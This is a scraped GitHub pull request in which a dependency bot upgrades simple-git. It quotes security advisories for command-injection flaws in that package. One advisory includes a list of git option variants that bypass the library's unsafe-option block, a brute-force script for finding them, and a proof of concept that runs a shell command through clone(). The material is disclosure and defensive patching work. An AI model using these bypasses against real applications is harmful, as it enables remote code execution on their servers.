Update dependency simple-git to v3 [SECURITY] by renovate[bot] · Pull Request #90 · sourcegraph/deploy-k8s-helper

renovate · 2022-03-17T22:03:57Z

This PR contains the following updates:

Package	Change	Age	Confidence
simple-git (source)	`^2.38.0` → `^3.0.0`

GitHub Vulnerability Alerts

CVE-2022-24433

The package simple-git before 3.3.0 is vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options, it was possible to get arbitrary command execution.

Severity

CVSS Score: 8.1 / 10 (High)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-24066

simple-git (maintained as git-js named repository on GitHub) is a light weight interface for running git commands in any node.js application.The package simple-git before 3.5.0 are vulnerable to Command Injection due to an incomplete fix of CVE-2022-24433 which only patches against the git fetch attack vector. A similar use of the --upload-pack feature of git is also supported for git clone, which the prior fix didn't cover. A fix was released in simple-git@3.5.0.

Severity

CVSS Score: 8.1 / 10 (High)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-25912

The package simple-git before 3.15.0 is vulnerable to Remote Code Execution (RCE) when enabling the ext transport protocol, which makes it exploitable via clone() method. This vulnerability exists due to an incomplete fix of CVE-2022-24066.

Severity

CVSS Score: 8.1 / 10 (High)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-25860

Versions of the package simple-git before 3.16.0 are vulnerable to Remote Code Execution (RCE) via the clone(), pull(), push() and listRemote() methods, due to improper input sanitization. This vulnerability exists due to an incomplete fix of CVE-2022-25912.

Severity

CVSS Score: 9.8 / 10 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-28291

Summary

simple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is likely to affect all versions prior to and including 3.28.0.

Detail

This vulnerability was introduced by an incorrect patch for CVE-2022-25860.

It was reproduced in the following environment:


WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

The issue was not reproduced on Windows 11.

The -u option, like --upload-pack, allows a command to be executed.

Currently, the -u and --upload-pack options are blocked in the file simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts.

function preventUploadPack(arg: string, method: string) {
   if (/^\s*--(upload|receive)-pack/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'clone' && /^\s*-u\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of clone with option -u is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'push' && /^\s*--exec\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of push with option --exec is not permitted without enabling allowUnsafePack`
      );
   }
}

However, the problem is that command option parsing is quite flexible.

By brute forcing, I found various options that bypass the -u check.

[
  '--u', '--u',
  '-4u', '-6u',
  '-lu', '-nu',
  '-qu', '-su',
  '-vu'
]

All of the above are three-character options that allow command execution. They enable execution even when allowUnsafePack is explicitly set to false.

The depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the -u option, there is also the --upload-pack option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.

Therefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.

Just in case, I’ll share the brute-force code I used to find options that enable command execution.

const fs = require('fs');
const simpleGit = require('simple-git');

const TMP_DIR = './pwned/';
const ITER = 256;

function cleanTmpDir() {
    if (fs.existsSync(TMP_DIR)) {
        fs.rmSync(TMP_DIR, { recursive: true, force: true });
    }
    fs.mkdirSync(TMP_DIR, { recursive: true });
}

function getPwnedFiles() {
    const found = [];
    for (let i = 0; i < ITER; i++) {
        const fname1 = `${TMP_DIR}1_${i}`;
        const fname2 = `${TMP_DIR}2_${i}`;
        const fname3 = `${TMP_DIR}3_${i}`;
        if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');
        if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');
        if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));
    }
    return found;
}

async function runTest(runIdx) {
    const git = simpleGit();
    // 1. `${~}-u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \"touch ${TMP_DIR}1_${i}\"`]);
        } catch {}
    }
    // 2. `-${~}u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \"touch ${TMP_DIR}2_${i}\"`]);
        } catch {}
    }
    // 3. `-u${~}` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \"touch ${TMP_DIR}3_${i}\"`]);
        } catch {}
    }
}

async function main() {
    cleanTmpDir();
    await runTest();

    const found = getPwnedFiles();
    
    console.log(found);
}

main();

PoC

The environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.

WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

Create any git repository inside the testrepo1 folder. A very simple repository with a single commit and a single file is fine.

Run the following:

const { simpleGit } = require('simple-git');

async function main() {
    const git = await simpleGit({ unsafe: { allowUnsafePack: false } });
    await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \"touch /tmp/pwned\"`]);
}

main();

This PoC explicitly configures allowUnsafePack to false. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.

Check /tmp to confirm that pwned has been created.
If it failed, try replacing -vu with a different option from the list.

Impact

This vulnerability is likely to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).

Severity

CVSS Score: 8.1 / 10 (High)
Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Release Notes

steveukx/git-js (simple-git)

Conversation

renovate bot commented Mar 17, 2022 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Severity

Severity

Severity

Severity

Summary

Detail

PoC

Impact

Severity

Release Notes

Minor Changes

Patch Changes

Patch Changes

Minor Changes

Minor Changes

Minor Changes

Minor Changes

Patch Changes

Minor Changes

Minor Changes

Patch Changes

Minor Changes

Minor Changes

Patch Changes

Minor Changes

Minor Changes

Patch Changes

Minor Changes

Patch Changes

Minor Changes

Minor Changes

Patch Changes

Minor Changes

Patch Changes

Minor Changes

Patch Changes

Patch Changes

Minor Changes

Patch Changes

Patch Changes

Minor Changes

Minor Changes

Patch Changes

Minor Changes

Minor Changes

Patch Changes

Minor Changes

Minor Changes

Minor Changes

Patch Changes

Patch Changes

Minor Changes

Patch Changes

Minor Changes

Patch Changes

Minor Changes

Minor Changes

Minor Changes

Patch Changes

Patch Changes

Features

3.0.4 (2022-01-23)

Bug Fixes

3.0.3 (2022-01-20)

Bug Fixes

3.0.2 (2022-01-18)

Bug Fixes

3.0.1 (2022-01-18)

Bug Fixes

Features

3.0.4 (2022-01-23)

Bug Fixes

3.0.3 (2022-01-20)

Bug Fixes

3.0.2 (2022-01-18)

Bug Fixes

renovate bot commented Mar 17, 2022 •

edited

Loading